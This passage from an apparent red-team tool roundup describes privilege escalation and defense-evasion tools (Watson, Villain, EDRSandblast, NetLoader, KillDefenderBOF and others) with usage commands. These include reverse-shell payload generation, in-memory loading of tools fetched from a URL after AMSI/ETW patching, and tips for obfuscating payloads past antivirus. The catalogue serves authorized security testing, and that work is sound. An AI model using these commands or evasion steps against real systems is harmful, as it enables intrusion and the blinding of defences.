• Description: Watson is a .NET tool that enumerates the installed Windows build and patches and compares them against its list of known local privilege escalation vulnerabilities, reporting the CVEs the host appears to be missing fixes for. It is the on-host counterpart of Windows-Exploit-Suggester, without the spreadsheet.
• Installation: Download from the GitHub repository and build with Visual Studio, picking the .NET Framework version present on the target: https://github.com/rasta-mouse/Watson
• Usage: Run `Watson.exe` on the host. Its vulnerability list is maintained by hand and lags behind new CVEs, so an empty result does not mean the host is patched, and a hit is a lead to verify, not a confirmed exploit.

5. Bat-Potato:

• Description: Bat-Potato is a Windows privilege escalation tool that automates common privilege escalation methods.
• Installation: Download from GitHub repository: https://github.com/EmpireProject/Bat-Potato
• Usage: Run Bat-Potato:

powershell.exe -ExecutionPolicy Bypass -File bat-potato.ps1

DEFENSE EVASION

1. Villain:

• Description: Villain is a Python C2/backdoor generator built on HoaxShell: it produces Windows and Linux reverse shell payloads that call back over HTTP(S), and lets several operators share and forward their sessions. It does not modify existing executables.
• Installation: Clone from the GitHub repository and install the requirements: https://github.com/t3l3machus/Villain
• Usage: Start the console with `python3 Villain.py`, then generate a payload for the target OS and listening interface:

generate payload=windows/netcat lhost=eth0

Run the one-liner it prints on the target; the session appears under `sessions`, and `shell <session id>` attaches to it. The stock payloads are well known to AV, so add the `encode` option or obfuscate them before relying on them.

2. EDRSandBlast:

• Description: EDRSandblast is a C tool that blinds EDR products from the kernel: it loads a signed-but-vulnerable driver, uses the arbitrary read/write it provides to remove the EDR's kernel notification callbacks (process, thread, image load, registry) and to disable the ETW Threat Intelligence provider, and unhooks user-mode API hooks in its own process. It then runs the chosen action (a command, an LSASS dump) unobserved.
• Installation: Download from the GitHub repository and build with Visual Studio. The vulnerable driver is not bundled, and the kernel offsets for the target's ntoskrnl and wdigest versions come from a CSV the tool can download or extract:
https://github.com/wavestone-cdt/EDRSandblast
• Usage: Start with an audit to see what it would remove before removing anything:

EDRSandblast.exe audit --usermode --kernelmode

Loading a driver requires administrator rights, fails on hosts enforcing Microsoft's vulnerable driver blocklist, and leaves a driver-load event behind; treat it as a high-risk action that needs explicit sign-off in the engagement rules.

3. SPAWN - Cobalt Strike BOF:

• Description: SPAWN is a Cobalt Strike Beacon Object File that spawns a sacrificial process with a spoofed parent PID and the BlockDLL and Arbitrary Code Guard mitigations set, then injects shellcode into it and runs it. Because non-Microsoft DLLs cannot load into the new process, the EDR's user-mode hooks are never installed in it.
• Installation: Download from the GitHub repository and build the BOF with the provided Makefile (MinGW): https://github.com/boku7/SPAWN
• Usage: Load the aggressor script (.cna) in Cobalt Strike and run the `spawn` command from a Beacon, following the README for the listener and architecture arguments. This defeats user-mode hooks only: the process creation, the spoofed parent and the injection remain visible to kernel callbacks and ETW-TI, so pair it with sensible process choices rather than treating it as invisibility.


4. NetLoader:

• Description: NetLoader is a small C# loader that fetches a .NET assembly (Rubeus, Seatbelt, SharpUp and the like) from a URL or a local path and runs it in memory, after patching AMSI and ETW in its own process so the loaded assembly is neither scanned nor traced. It loads .NET assemblies, not raw shellcode.
• Installation: Download from the GitHub repository and build with Visual Studio, or take the prebuilt binary from SharpCollection: https://github.com/Flangvik/NetLoader
• Usage: Pass the assembly location followed by the assembly's own arguments:

NetLoader.exe https://10.10.10.10/Seatbelt.exe -group=system

Two things blunt it: the AMSI/ETW patches are themselves well-known byte patterns that EDRs watch for, and the loaded tool's strings are still in memory, so pair it with an obfuscated build of the tool rather than the stock release.

5. KillDefenderBOF:

• Description: KillDefenderBOF is a Cobalt Strike Beacon Object File that ports the KillDefender technique: from a SYSTEM context it strips the privileges and lowers the integrity level of the Defender service process token (MsMpEng.exe), so Defender keeps running but can no longer scan or act. It does not stop the service, which is the part that is usually monitored.
• Installation: Download from the GitHub repository and build the BOF with its Makefile:
https://github.com/Cerbersec/KillDefenderBOF
• Usage: Load the .cna in Cobalt Strike and run the command from a Beacon running as SYSTEM. Microsoft has since hardened Defender against this token manipulation, so expect it to fail on current builds; test it in a lab first, and remember that the privilege removal on MsMpEng.exe is itself a detectable event worth showing the blue team.

CONCLUSION

In the realm of offensive security operations, a diverse toolkit is essential for effective red teaming.
This compilation presents a wide array of tools categorized by their functions, enabling security
professionals to carry out thorough assessments and simulations. From reconnaissance and initial
access to delivery, command and control, credential dumping, privilege escalation, and defense
evasion, each tool plays a crucial role in the red teaming process.

It's important to emphasize that these tools should only be used in ethical and authorized contexts,
ensuring that no harm is caused to legitimate systems or networks. Ethical hacking and penetration
testing help organizations identify vulnerabilities, improve defenses, and ultimately enhance overall
cybersecurity posture.

As the landscape of cybersecurity continues to evolve, the knowledge and skills to responsibly wield
these tools become increasingly valuable. Remember, the success of red teaming lies not just in the
tools themselves, but in the expertise, strategy, and ethical considerations that guide their application.

Follow :
https://www.linkedin.com/in/goverdhankumar
https://github.com/wh04m1i
https://linktr.ee/g0v3rdh4n
https://instagram.com/who4m1i
